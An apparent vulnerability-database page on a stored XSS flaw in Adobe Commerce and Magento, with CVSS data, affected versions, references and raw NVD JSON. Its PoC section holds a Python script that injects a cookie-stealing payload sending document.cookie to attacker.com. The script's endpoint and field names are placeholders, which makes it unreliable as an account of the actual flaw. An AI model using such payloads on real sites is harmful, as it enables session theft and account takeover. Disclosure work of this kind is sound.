CVE-2025-54266

Description

Adobe Commerce versions 2.4.9-alpha2, 2.4.8-p2, 2.4.7-p7, 2.4.6-p12, 2.4.5-p14, 2.4.4-p15 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. Exploitation of this issue requires user interaction in that a victim must browse to the page containing the vulnerable field. Scope is changed.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:commerce:2.4.4:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce:2.4.4:p1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce:2.4.4:p10:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce:2.4.4:p11:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce:2.4.4:p12:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:p1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:p10:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:p11:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:commerce_b2b:1.3.3:p12:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:-:*:*:open_source:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:p1:*:*:open_source:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:p10:*:*:open_source:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:p11:*:*:open_source:*:*:* - VULNERABLE

cpe:2.3:a:adobe:magento:2.4.6:p12:*:*:open_source:*:*:* - VULNERABLE

Adobe Commerce 2.4.9-alpha2

Adobe Commerce 2.4.8-p2

Adobe Commerce 2.4.7-p7

Adobe Commerce 2.4.6-p12

Adobe Commerce 2.4.5-p14

Adobe Commerce 2.4.4-p15

Adobe Commerce <= 2.4.4-p15的所有更早版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-54266 - Adobe Commerce Stored XSS PoC # This PoC demonstrates the stored XSS vulnerability in Adobe Commerce form fields import requests TARGET_URL = "https://target-adobe-commerce.com" ADMIN_USERNAME = "admin" ADMIN_PASSWORD = "password123" # Step 1: Login as high-privileged admin user session = requests.Session() login_data = { "login[username]": ADMIN_USERNAME, "login[password]": ADMIN_PASSWORD, "form_key": "FORM_KEY_HERE" } session.post(f"{TARGET_URL}/admin/user/login", data=login_data) # Step 2: Inject malicious JavaScript into vulnerable form field # The payload will be stored and executed when victims view the page xss_payload = """ <script> // Steal session cookies and send to attacker server var img = new Image(); img.src = "https://attacker.com/steal?cookie=" + document.cookie; // Perform actions on behalf of the victim fetch('/admin/customer/save', { method: 'POST', body: JSON.stringify({email: '[email protected]'}) }); </script> """ # Step 3: Submit payload through vulnerable form field malicious_data = { "field_name": xss_payload, # Vulnerable form field "form_key": "FORM_KEY_HERE" } response = session.post( f"{TARGET_URL}/admin/vulnerable_endpoint", data=malicious_data ) print(f"Payload submitted. Status: {response.status_code}") print("When any user browses to the affected page, the script will execute.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-54266
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-54266
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-54266/
[4] VulDB https://vuldb.com/cve/CVE-2025-54266
[5] https://helpx.adobe.com/security/products/magento/apsb25-94.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-54266", "sourceIdentifier": "[email protected]", "published": "2025-10-14T21:15:35.420", "lastModified": "2025-10-20T13:47:38.243", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Commerce versions 2.4.9-alpha2, 2.4.8-p2, 2.4.7-p7, 2.4.6-p12, 2.4.5-p14, 2.4.4-p15 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. Exploitation of this issue requires user interaction in that a victim must browse to the page containing the vulnerable field. Scope is changed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:-:*:*:*:*:*:*", "matchCriteriaId": "D258D9EF-94FB-41F0-A7A5-7F66FA7A0055"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p1:*:*:*:*:*:*", "matchCriteriaId": "4E5CF6F0-2388-4D3F-8FE1-43B8AF148564"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p10:*:*:*:*:*:*", "matchCriteriaId": "1C3D7164-1C5F-40BC-9EEC-B0E00CD45808"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p11:*:*:*:*:*:*", "matchCriteriaId": "68AAE162-5957-42AF-BE20-40F341837FAC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p12:*:*:*:*:*:*", "matchCriteriaId": "D9D01159-3309-4F6B-93B0-2D89DDD33DEE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p13:*:*:*:*:*:*", "matchCriteriaId": "91736E79-D8E7-4AF2-8E01-A7B4EB8AD6F4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p14:*:*:*:*:*:*", "matchCriteriaId": "8412C043-64E7-4DFF-A303-13A6FE113BFB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p15:*:*:*:*:*:*", "matchCriteriaId": "BBDA2BCF-E784-4CF3-B30D-6FF5BEE2055F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p2:*:*:*:*:*:*", "matchCriteriaId": "D6D6F1A7-ABB5-4EDC-9EA8-98B74518847A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p3:*:*:*:*:*:*", "matchCriteriaId": "CFEBDDF2-6443-4482-83B2-3CD272CF599F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p4:*:*:*:*:*:*", "matchCriteriaId": "6661093F-8D22-450F-BC6C-A8894A52E6A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p5:*:*:*:*:*:*", "matchCriteriaId": "2515DA6D-2E74-4A05-BD29-FEEF3322BCB6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p6:*:*:*:*:*:*", "matchCriteriaId": "69A1F1F7-E53C-40F3-B3D9-DC011FC353BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p7:*:*:*:*:*:*", "matchCriteriaId": "6A56E96C-6CE5-442C-AA88-F0059B02B5E7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p8:*:*:*:*:*:*", "matchCriteriaId": "8867F510-201C-4199-8554-53DE156CE669"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.4:p9:*:*:*:*:*:*", "matchCriteriaId": "23988132-DD4E-4968-B6B8-954122F76081"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:-:*:*:*:*:*:*", "matchCriteriaId": "9B07F7B2-E915-4EFF-8FFC-91143CEF082E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p1:*:*:*:*:*:*", "matchCriteriaId": "7F5E9DB6-1386-4274-8270-2FE0F0CAF7FD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p10:*:*:*:*:*:*", "matchCriteriaId": "5764CC97-C866-415D-A3A1-5B5B9E1C06A6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p11:*:*:*:*:*:*", "matchCriteriaId": "E82D10D8-2894-4E5B-B47B-F00964DD5CDE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p12:*:*:*:*:*:*", "matchCriteriaId": "B044F2D9-E888-4852-8A40-DCE688860ED3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p13:*:*:*:*:*:*", "matchCriteriaId": "6423C754-36F9-4680-9211-60940ED63E79"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p14:*:*:*:*:*:*", "matchCriteriaId": "3472064A-8C79-436B-965A-96834AE8D346"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p2:*:*:*:*:*:*", "matchCriteriaId": "8605E4E6-0F7D-42C8-B35B-2349A0BEFC69"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:commerce:2.4.5:p3:*:*:*:*:*:*", "matchCriteriaId": "B63 ... (truncated)